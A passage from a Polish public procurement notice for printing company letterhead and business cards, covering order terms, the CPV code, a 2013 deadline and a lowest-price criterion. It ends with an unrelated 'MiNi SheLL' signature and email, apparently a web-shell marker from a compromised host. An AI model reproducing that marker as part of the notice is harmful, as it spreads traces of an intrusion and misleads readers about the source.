1.5. Wybrany w trakcie postępowania Wykonawca otrzyma od Zamawiającego wzór papierów firmowych oraz wizytówek w formie druków akcydensowych zawartych w systemie identyfikacji wizualnej (wersja papierowa i pliki pdf). 
1.6. W przypadku zmiany wzorów druków Zamawiający zastrzega możliwość ich zamiany w ramach umówionej ceny sprzedaży. 
1.7. Zamawiający w trakcie trwania umowy może dokonywać przesunięć ilościowych asortymentu według bieżących potrzeb i celowości ich zakupu wyłącznie w granicach kwoty wskazanej jako wartość zamówienia w umowie w sprawie zamówienia publicznego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.80.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com